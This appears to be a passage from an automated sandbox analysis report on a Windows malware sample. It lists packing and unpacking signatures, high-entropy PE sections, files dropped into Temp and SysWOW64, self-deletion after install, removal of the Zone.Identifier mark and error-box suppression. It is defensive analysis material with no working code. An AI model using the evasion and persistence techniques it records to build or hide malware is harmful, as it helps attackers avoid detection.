                      Source: 26.2.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.2.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.0.FD6B.exe.cf0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.0.FD6B.exe.cf0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.0.FD6B.exe.cf0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.0.FD6B.exe.cf0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.0.FD6B.exe.cf0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.0.FD6B.exe.cf0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: 9ro85QVN0F.exeStatic PE information: More than 200 imports for KERNEL32.dll
                      Source: 9ro85QVN0F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 9ro85QVN0F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 9ro85QVN0F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 9ro85QVN0F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 9ro85QVN0F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 9ro85QVN0F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 9ro85QVN0F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\beritu100-kif-hi.pdb source: F4CF.exe, 00000019.00000000.409125786.0000000000401000.00000020.00020000.sdmp, F4CF.exe.11.dr, bzxmernq.exe.25.dr
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 411E.exe, 00000013.00000000.399120089.0000000000413000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.385802310.0000000000413000.00000002.00020000.sdmp, 411E.exe.11.dr
                      Source: Binary string: C:\coduluvi\vebazomimohey20-dubelat-cudecufoc 51\muzavibow63 r.pdb source: FE11.exe.11.dr, 433C.exe.11.dr
                      Source: Binary string: @RC:\jadawac53 buxabalafubiro.pdbh source: D54.exe.11.dr
                      Source: Binary string: C:\wufiruy\zoji_batodetumoz97\toboyese.pdb source: E6C4.exe, 00000018.00000000.402465553.0000000000401000.00000020.00020000.sdmp, E6C4.exe.11.dr
                      Source: Binary string: _TC:\wufiruy\zoji_batodetumoz97\toboyese.pdbh source: E6C4.exe, 00000018.00000000.402465553.0000000000401000.00000020.00020000.sdmp, E6C4.exe.11.dr
                      Source: Binary string: fHSC:\kaya\ginonohu.pdbh source: 9ro85QVN0F.exe, iscgwer.11.dr, 53DC.exe.11.dr
                      Source: Binary string: \C:\coduluvi\vebazomimohey20-dubelat-cudecufoc 51\muzavibow63 r.pdb source: FE11.exe.11.dr, 433C.exe.11.dr
                      Source: Binary string: C:\beritu100-kif-hi.pdbh source: F4CF.exe, 00000019.00000000.409125786.0000000000401000.00000020.00020000.sdmp, F4CF.exe.11.dr, bzxmernq.exe.25.dr
                      Source: Binary string: C:\jadawac53 buxabalafubiro.pdb source: D54.exe.11.dr
                      Source: Binary string: C:\kaya\ginonohu.pdb source: 9ro85QVN0F.exe, iscgwer.11.dr, 53DC.exe.11.dr
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 411E.exe, 00000013.00000000.399120089.0000000000413000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.385802310.0000000000413000.00000002.00020000.sdmp, 411E.exe.11.dr

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeUnpacked PE file: 24.2.E6C4.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeUnpacked PE file: 25.2.F4CF.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeUnpacked PE file: 24.2.E6C4.exe.400000.0.unpack .text:ER;.data:W;.zufow:W;.ruh:W;.yilub:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeUnpacked PE file: 25.2.F4CF.exe.400000.0.unpack .text:ER;.data:W;.gemuta:W;.yid:W;.yofuyiz:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: 26.0.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 26.2.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 26.0.FD6B.exe.cf0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 26.0.FD6B.exe.cf0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 42.0.FD6B.exe.1a0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 42.0.FD6B.exe.1a0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00633634 push es; iretd
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_008E95C8 push esi; ret
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_008E962D push esi; ret
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 16_2_00563634 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_00412CA4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 20_2_00633634 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 20_2_008595C8 push esi; ret
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 20_2_0085962D push esi; ret
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeCode function: 22_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_004139B0 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_0043ED0C push esp; retn 0043h
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00673C00 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_00CF8508 push 00000028h; retf 0000h
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_00CF764A push esp; ret
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_013D4003 push esi; retf
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeCode function: 26_2_056F2503 push E80A995Eh; ret
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_0042D800 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: 53A8.exe.11.drStatic PE information: 0xAB35ADD6 [Sat Jan 8 14:57:26 2061 UTC]
                      Source: 9ro85QVN0F.exeStatic PE information: section name: .tad
                      Source: 9ro85QVN0F.exeStatic PE information: section name: .lux
                      Source: 9ro85QVN0F.exeStatic PE information: section name: .civujo
                      Source: D54.exe.11.drStatic PE information: section name: .gizi
                      Source: D54.exe.11.drStatic PE information: section name: .bur
                      Source: D54.exe.11.drStatic PE information: section name: .wob
                      Source: 14F6.exe.11.drStatic PE information: section name: .code
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name: .28gybOo
                      Source: 27E3.exe.11.drStatic PE information: section name: .adata
                      Source: 53A8.exe.11.drStatic PE information: section name: .didata
                      Source: 656C.exe.11.drStatic PE information: section name: .code
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name: .HQIHSjN
                      Source: 7480.exe.11.drStatic PE information: section name: .adata
                      Source: 53DC.exe.11.drStatic PE information: section name: .tad
                      Source: 53DC.exe.11.drStatic PE information: section name: .lux
                      Source: 53DC.exe.11.drStatic PE information: section name: .civujo
                      Source: E6C4.exe.11.drStatic PE information: section name: .zufow
                      Source: E6C4.exe.11.drStatic PE information: section name: .ruh
                      Source: E6C4.exe.11.drStatic PE information: section name: .yilub
                      Source: F4CF.exe.11.drStatic PE information: section name: .gemuta
                      Source: F4CF.exe.11.drStatic PE information: section name: .yid
                      Source: F4CF.exe.11.drStatic PE information: section name: .yofuyiz
                      Source: iscgwer.11.drStatic PE information: section name: .tad
                      Source: iscgwer.11.drStatic PE information: section name: .lux
                      Source: iscgwer.11.drStatic PE information: section name: .civujo
                      Source: bzxmernq.exe.25.drStatic PE information: section name: .gemuta
                      Source: bzxmernq.exe.25.drStatic PE information: section name: .yid
                      Source: bzxmernq.exe.25.drStatic PE information: section name: .yofuyiz
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                      Source: 27E3.exe.11.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                      Source: FD6B.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                      Source: 656C.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x67108
                      Source: 7480.exe.11.drStatic PE information: real checksum: 0x36f63f should be: 0x375646
                      Source: 14F6.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x5ff14
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96623040888
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.2566886804
                      Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                      Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                      Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                      Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                      Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                      Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                      Source: initial sampleStatic PE information: section name: entropy: 7.99714283383
                      Source: initial sampleStatic PE information: section name: entropy: 7.90902856434
                      Source: initial sampleStatic PE information: section name: entropy: 7.99421567253
                      Source: initial sampleStatic PE information: section name: entropy: 7.80301292615
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22498051033
                      Source: initial sampleStatic PE information: section name: .HQIHSjN entropy: 7.91963122451
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96623040888
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.98155408377
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96408793747
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96623040888
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96408793747
                      Source: FD6B.exe.11.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: FD6B.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 26.0.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 26.0.FD6B.exe.cf0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 26.2.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 26.2.FD6B.exe.cf0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 26.0.FD6B.exe.cf0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 26.0.FD6B.exe.cf0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 26.0.FD6B.exe.cf0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 26.0.FD6B.exe.cf0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 26.0.FD6B.exe.cf0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 26.0.FD6B.exe.cf0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 42.0.FD6B.exe.1a0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 42.0.FD6B.exe.1a0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 42.0.FD6B.exe.1a0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 42.0.FD6B.exe.1a0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\iscgwerJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\iscgwerJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7480.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\433C.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\jdijwvkg\bzxmernq.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeFile created: C:\Users\user\AppData\Local\Temp\bzxmernq.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FD6B.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\411E.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E6C4.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\27E3.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\656C.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FE11.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\14F6.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\53A8.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\53DC.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D54.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F4CF.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\jdijwvkg\bzxmernq.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeCode function: 25_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Deletes itself after installationShow sources
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\9ro85qvn0f.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\iscgwer:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FindAtomW,FindAtomW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeProcess information set: NOOPENFILEERRORBOX
